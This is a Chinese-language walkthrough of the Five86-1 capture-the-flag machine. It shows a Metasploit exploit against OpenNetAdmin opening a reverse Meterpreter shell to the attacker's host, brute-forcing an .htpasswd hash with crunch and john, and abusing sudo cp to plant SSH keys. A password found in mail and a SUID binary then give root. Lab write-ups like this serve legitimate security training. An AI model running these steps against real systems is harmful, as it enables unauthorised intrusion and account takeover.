five86-1
# Five86-1 靶机实践
# 0x01 渗透实践
nmap扫一下开了22和80,
80界面是个OpenNetAdmin
翻下Exploit-db,刚好有对应版本的metasploit exp,下载下来搞一搞
msfdb init
msfconsole
msf5 > use exploit/47772
msf5 exploit(47772) > set rhost 192.168.31.179
rhost => 192.168.31.179
msf5 exploit(47772) > set lhost 192.168.31.51
lhost => 192.168.31.51
msf5 exploit(47772) > exploit
[*] Started reverse TCP handler on 192.168.31.51:4444
[*] Exploiting...
[*] Sending stage (985320 bytes) to 192.168.31.179
[*] Meterpreter session 1 opened (192.168.31.51:4444 -> 192.168.31.179:59022) at 2020-02-27 21:29:15 +0800
[*] Command Stager progress - 100.14% done (706/705 bytes)
meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
接下来就是慢慢看突破点了
home下目录进不去
找到/var/www下有.htpasswd
大概就是用来保存一个用户,网站只能得到该用户的权限
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
1
2
3
4
2
3
4
还贴心了给了提示,方便你构造爆破字典。。。
root@kali:~/five86# crunch 10 10 aefhrt > dic.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
root@kali:~/five86#
root@kali:~/five86# echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash
root@kali:~/five86# john --wordlist=/root/five86/dic.txt hash
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
爆破拿到fatherrrrr (douglas)
meterpreter > shell
Process 2331 created.
Channel 4 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@five86-1:~$ su douglas
su douglas
Password: fatherrrrr
douglas@five86-1:/var/www$
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
sudo -l看一下
douglas@five86-1:~$ sudo -l
sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
那么我们可以利用jen的权限往他目录下的./ssh添加我们的authorized_keys,就能连接到他的账号了
cat id_rsa.pub > /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh
1
2
3
4
2
3
4
cd .ssh
cp id_rsa /tmp
cd /tmp
chmod 600 id_rsa
ssh -i id_rsa jen@localhost
1
2
3
4
5
2
3
4
5
注意id_rsa的文件权限要设置为600,不然会提示
Permissions 0777 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
1
2
3
4
2
3
4
登上去sudo -l发现需要密码
其实登陆时有个提示是
You have new mail.
去读下邮件
找到
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
1
现在我们可以登陆Moss的账号了
sudo -l无果,
看下SUID
moss@five86-1:/var/mail$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/home/moss/.games/upyourgame
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
最后一个很有意思
moss@five86-1:/var/mail$ /home/moss/.games/upyourgame
/home/moss/.games/upyourgame
Would you like to play a game? yes
yes
Could you please repeat that? yes
yes
Nope, you'll need to enter that again. yes
yes
You entered: No. Is this correct? no
no
We appear to have a problem? Do we have a problem? no
no
Made in Britain.
# id
id
uid=0(root) gid=1001(moss) groups=1001(moss)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
看到#试了一下,发现莫名其妙的就已经拿到了root权限。。。。
编辑 (opens new window)
上次更新: 2021/05/11, 08:36:49
